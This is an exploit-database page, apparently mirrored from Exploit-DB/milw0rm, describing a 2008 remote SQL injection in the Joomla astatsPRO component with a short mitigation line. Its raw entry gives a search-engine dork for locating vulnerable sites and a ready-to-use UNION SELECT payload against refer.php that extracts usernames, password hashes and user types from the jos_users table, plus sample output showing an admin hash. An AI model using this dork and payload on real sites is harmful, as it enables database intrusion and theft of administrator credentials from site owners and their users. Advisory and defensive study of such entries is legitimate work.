header-logo
Suggest Exploit
vendor:
astatsPRO
by:
ka0x
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: astatsPRO
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: YES
Related CWE: N/A
CPE: a:joomla:astatspro
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component astatsPRO Remote SQL Injection Vulnerability

A vulnerability exists in Joomla Component astatsPRO, which allows an attacker to inject arbitrary SQL commands via the 'id' parameter in the 'refer.php' script. This can be exploited to disclose the admin username and password hash, as well as other sensitive information from the database.

Mitigation:

Upgrade to the latest version of Joomla Component astatsPRO.
Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 Joomla Component astatsPRO Remote SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

## bug found by ka0x
## D.O.M TEAM 2008
## we are: ka0x, an0de, xarnuz
## http://www.domlabs.org/
## contact: ka0x01[at]gmail.com
## from spain

d0rk: allinurl: "com_astatspro"

PoC: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),concat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*


Look at the code of the page:

<HTML>
<HEAD>

    <TITLE>302 Moved</TITLE>

</HEAD>
<BODY BGCOLOR=#FFFFFF>

    <H1>302 Moved</H1>
    The document has moved <A HREF="admin:c9cb9115e90580e14a0407ed1fcf8039:Super Administrator">here</A>.


</BODY>
</HTML>

greets: ssh-2, phnx, nettoxic, jns07, her0, JosS, Plexinium Team, FaLENcE, Hendrix,
        Piker, you_kn0w, Celciuz, Lady_Lara, The Shredder, RedHack Team, zickox, Furtivo.
       

__EOF__

    <name>astatsPRO</name>
    <creationDate>16/07/2006</creationDate>
    <author>www.joom.la</author>
    <copyright>Copyright (c) 2006 mobico (Marcel Boettcher)</copyright>
    <authorEmail>info@joom.la</authorEmail>

    <authorUrl>http://astatspro.joom.la/</authorUrl>
    <version>1.0.0</version>
    <description><![CDATA[
  <span>1.0.0 [stable] Component - to count your visitors.</span> <b> Z&auml;hlt ihre Besucher.</b>
<p><b>astatsPRO is based on:</b> <a target="_blank"  href="http://christoph-bachner.net/chcounter/"> chCounter 3.1.1 (13|07|2005)©2005 www.Christoph Bachner.net</a><br /><br /></p>
  	]]>
  	</description>

# milw0rm.com [2008-02-18]

Navigation

Suggest Exploit

Services By CQR